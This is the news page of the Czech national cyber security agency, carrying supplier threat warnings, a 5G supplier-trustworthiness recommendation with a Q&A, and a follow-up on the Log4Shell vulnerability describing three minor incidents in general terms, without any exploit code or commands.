Main Page

National Cyber and Information Security Agency

Logo NÚKIB

Selected News

NÚKIB issued a warning

The National Cyber and Information Security Agency issues the following warning against a cyber security threat consisting of non-compliance with contractual obligations by suppliers of ICT services and products with significant ties to the Russian Federation. The Agency rates the threat as High – the threat is likely to very likely.

The National Cyber and Information Security Agency issues the following: Warning

NÚKIB issued a warning

The National Cyber and Information Security Agency issues the following warning against a cyber security threat, consisting in the implementation of cyber attacks on information and communication systems in the Czech Republic, in particular on the public administration systems, but also other strategic organisations. These attacks can have an impact on the availability, confidentiality or integrity of information in important information and communication systems.

The Agency assesses this threat as Critical - The threat is very likely to almost certain.

You can find the whole document: Warning

 

The Recommendation for assessing the trustworthiness of technology suppliers of 5G networks in the Czech Republic

The National Cyber and Information Security Agency (NÚKIB) together with the Ministry of Industry and Trade, the Ministry of Foreign Affairs, the Security Information Service, the Office for Foreign Relations and Information, and the Military Intelligence published The Recommendation for assessing the trustworthiness of technology suppliers of 5G networks in the Czech Republic (hereinafter the „Recommendation“).  The role of the next-generation telecommunications networks for society is essential. Therefore, efforts to reduce security risks are necessary in order to create and maintain a resilient infrastructure in the Czech Republic. The aim of the Recommendation is to offer operators – and the entire electronic communications sector – the views of the relevant state institutions on crucial points for assessing the trustworthiness of suppliers of technologies for 5G networks, and to propose criteria that can contribute to the selection of trustworthy suppliers.

The publication of the Recommendation further builds upon the internationally declared position of the Czech Republic within the field of security of 5G networks. In 2019, a series of recommendations called Prague Proposals on cyber security of communication networks was announced. Subsequently, the Czech Republic also considerably participated in the preparing the EU 5G Toolbox, which was published on the European Union level in 2020.

“The Recommendation provides guidance especially for the supplies to the information and communication systems of the critical infrastructure of the Czech Republic. During the preparation of the criteria, the possibility of their evaluation as well as their measurability was emphasized. These criteria are also universal principles that can be applied in a similar way in other sectors when implementing technologies.” says Karel Řehka, the director of NÚKIB. “Although Recommendation does not extend, cancel, or otherwise regulate any rights and obligations stipulated by generally binding legal regulations, it is necessary to set a trend, when trust towards a supplier does not only depend on the level of the final technical form of the delivered solution, but also reflects the strategic level – meaning the business, legal and political environment, in which the supplier operates.” the director adds.

Among the criteria the Recommendation suggests there is, for example, the evaluation of the fact that a supplier has a transparent ownership structure, or that he is able to prove that he applies the so-called security by design principle in his products, and that he practices effective security rules and processes.

The Recommendation was also discussed at the working group for cyber security under the 5G Alliance, which includes representatives of state bodies, representatives of academia, mobile operators, and other representatives of entrepreneurs in the electronic communications sector.

You can find the whole document : The Recommendation for assessing the trustworthiness of technology suppliers of 5G networks in the Czech Republic

 

Q&A on NÚKIB’s activities in the field of 5G networks – the Recommendation

Q: Why do you publish the Recommendation?

A: The need to address the matters connected with the trustworthiness of technology suppliers has been discussed at the expert level for some time now. The importance of this debate has further increased after the publication of the EU toolbox of mitigating measures for secure rollout and operation of 5G networks, known as the EU 5G Toolbox. Some of its measures, to which the Czech Republic has committed itself to fulfil, require the activity of the state, for which, however, legal competences are currently lacking. Thus, before these competencies are implemented via legislation, the state acts within the limits of its current powers and provides operators with guidelines that can help increase the security of their networks and services.

Following a discussion of the relevant state security institutions, the Recommendation was prepared. The document presents - within the current state competencies - its view on supply chain security, and offers operators ways to increase the security of their networks and minimize the negative impact on providing their services to end customers.

Q: Why do you publish the Recommendation now?

A: Although the rollout of 5G networks is already underway and these networks are already in commercial operation in some parts of the Czech Republic, all functionalities that these networks have the potential to bring are still not put into operation. Until the legislation that will allow the state to provide operators with a legal framework for building these networks is adopted, we want to help the telecommunications sector by publishing security guidelines, at least in the form of a recommendation, which offers operators non-binding security criteria.

Q: Who is the Recommendation for?

A: The aim of the recommendation is to provide guidance to telecommunications operators who are critical infrastructure information and communication systems administrators. The Recommendation offers a view of selected state institutions on the basis for assessing the trustworthiness of technology suppliers in 5G networks and proposes criteria that can contribute to the selection of trusted suppliers. Nevertheless, the proposed criteria are universal principles that can be applied in a similar way in other sectors when implementing technologies.

Q: Do operators have to comply with the Recommendation?

A: The Recommendation is by its nature a non-binding, supporting material, and therefore does not bring new obligations to the operators. Some parts of the Recommendation, however, correspond with existing legal obligations or with the best practice that operators follow voluntarily within their own business processes. The Recommendation is, in addition, based on international best practice and was prepared after discussions of relevant security state institutions.

Q: If the Recommendation is not mandatory for operators, does this mean that there are currently no restrictions on the selection of suppliers?

A: Operators, as well as other entities obliged by the Cyber Security Act must comply with the supplier management obligations set out in this Act, as well as other legal obligations. Furthermore, the NÚKIB warning from 2018 is still effective, which the relevant entities regulated by the Cyber Security Act must take into account.

Q: It is possible to understand the Recommendation as a model for future legal regulation?

A: The form of possible future regulation is currently subject to expert discussion, and the resulting legislation will be in the hands of legislators, so its form cannot be anticipated at this time.

Q: The topic of 5G networks has been discussed for a long time now. Why didn't the state start addressing this issue earlier?

A: NÚKIB, as well as other state bodies have been dealing with the topic of cyber security of 5G networks for a long time. It was already in 2019 when NÚKIB organized the first Prague 5G Security Conference that generated a significant international response, and we were also one of the main initiators of addressing this issue at the EU level, from which the EU 5G Toolbox emerged. Immediately after the adoption of the common approach of the EU Member States we began the process of preparing the Czech legal environment for the implementation of the EU 5G Toolbox measures, and the currently issued Recommendation is a part of this process.

Q: It is true that operators cannot evaluate some of the supplier trustworthiness criteria in the Recommendation themselves?

A: When creating the criteria, emphasis was placed on their universal applicability and evaluability by the entities operating electronic communications networks and services - operators. However, if an operator is not able to evaluate some of the criteria effectively, for example due to the lack of information or staff capacity, or if the relevant supplier does not meet some of the criteria, this does not automatically mean that it would not be appropriate to use the supplier. The suitability of the application and the weight of each criterion always depends on the context of the respective supply and especially on the consideration of the operator. However, we are convinced that fulfillment of the criteria will increase the credibility of the supplier.

Q: Will the Recommendations affect the price of telecommunications services?

A: The Recommendation does not impose any new rules or obligations on operators, so it should not affect service prices. In other countries, where similar measures have been taken, an increase in service prices for this reason has not been observed. However, it is necessary to keep in mind that the security of electronic communications networks should be a fundamental interest of the state, as well as any individual, and its provision is not free of charge.

One month since the release of the reactive measure to the Log4Shell vulnerability: NCISA does not see widespread abuse in the Czech Republic, but caution remains in order

More than a month has passed since the reactive measure related to the Log4Shell vulnerability was issued. This vulnerability, CVE-2021-44228, is present in the Apache Log4j logging component and has the highest possible criticality score of CVSS 10.0. Log4j is used by hundreds of systems and applications for logging, the total number of vulnerable systems was estimated to be in the higher hundreds of millions of systems worldwide at the time of detection, making Log4Shell highly critical. The vulnerability allows to attack even systems that are not directly accessible from the Internet, execute code on them completely without authentication, and gain full control of the server. This allows attackers to obtain access credentials, read and exfiltrate data, or install other malicious codes, including ransomware, all with relatively little effort, since exploiting this vulnerability is not technically difficult.

The Log4Shell vulnerability was announced on 9 December and NCISA alerted to its presence on its website the next day. After several days of analyzing and evaluating the potential impact on Czech cybersecurity, the agency decided to issue a reactive measure pursuant to Section 13 of Act No. 181/2014 Coll., on Cybersecurity.

After NCISA issued the reactive measure on December 15, additional vulnerabilities were discovered in Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105). Once the security community´s eyes were focused on Log4j, researchers around the world began analyzing it and found additional vulnerabilities in the affected logging component. However, none of these vulnerabilities were as critical as the original Log4Shell, and none had been widely exploited. Although CVE-2021-45046 had a criticality score of 9.0, the recommendations in the reactive measure issued applied to the entire Log4j component and therefore no additional change was required. In general, however, organizations need to maintain awareness of new vulnerabilities and continually update all of their systems.

The consequences of Log4Shell are not yet as extensive as we expected in the context of such a critical vulnerability. The NCISA has registered three incidents as of 21 January 2022 and classifies all of them as “minor” given their limited impact:

The administrators of the first organization decided to check for vulnerabilities in their systems after the NCISA issued the reactive measure. While implementing the recommended procedures, they found a log on one of their servers that indicated a possible security incident. The attacker was caught while trying to install a remote management tool on their systems; In the second case, the attackers installed cryptominer software on the attacked organization´s web server; In the third organization, attackers compromised a mobile device management server, but data shows they were unable to get deeper into the infrastructure.

The situation is similar in the rest of the world. Immediately after the vulnerability was announced, it was widely exploited by cryptominer and botnet groups, and one of the most active ransomware groups Conti used it to launch attacks. However, no serious incidents involving APT groups are yet publicly known.

There are several plausible explanations. The first is that the victims may not know they have been compromised. The compromise could have occurred quickly, and more sophisticated attackers could have quickly created another persistence and covered their tracks to indicate that Log4j was compromised. In fact, many APT groups often wait in their victims´ networks for the right moment to attack or attempt to remain undetected for cyber espionage purposes. Another explanation is that organizations have secured their Log4j products. After the reactive measure was issued, dozens of organizations have contacted the NCISA and requested system scans. The scans at most organizations were intercepted by scan-preventing technologies which means that third parties cannot easily determine whether or not vulnerable systems are present in their infrastructure. A sophisticated attacker would be able to bypass such measures in a targeted attack, but against general scans, where attackers try to discover vulnerable systems with as little effort as possible, the measures are effective.

Despite this, it is likely that the number of incidents registered by the NCISA in connection with the vulnerability is not final and more will be discovered. Log4Shell may also manifest itself in incidents where attackers can exploit it to move laterally within the infrastructure. Due to its nature, systems vulnerable to Log4Shell will continue in the medium term. Log4j is embedded in millions of programs and organizations are dependent on their authors to patch them. In addition, the Microsoft Threat Intelligence Center (MSTIC) has confirmed that APT groups are adding Log4Shell to their palette of tools in use. These are groups that generally have rather long-term goals and often try to remain undetected in their victims´ networks. Therefore, there is a real possibility that their attacks will materialize later.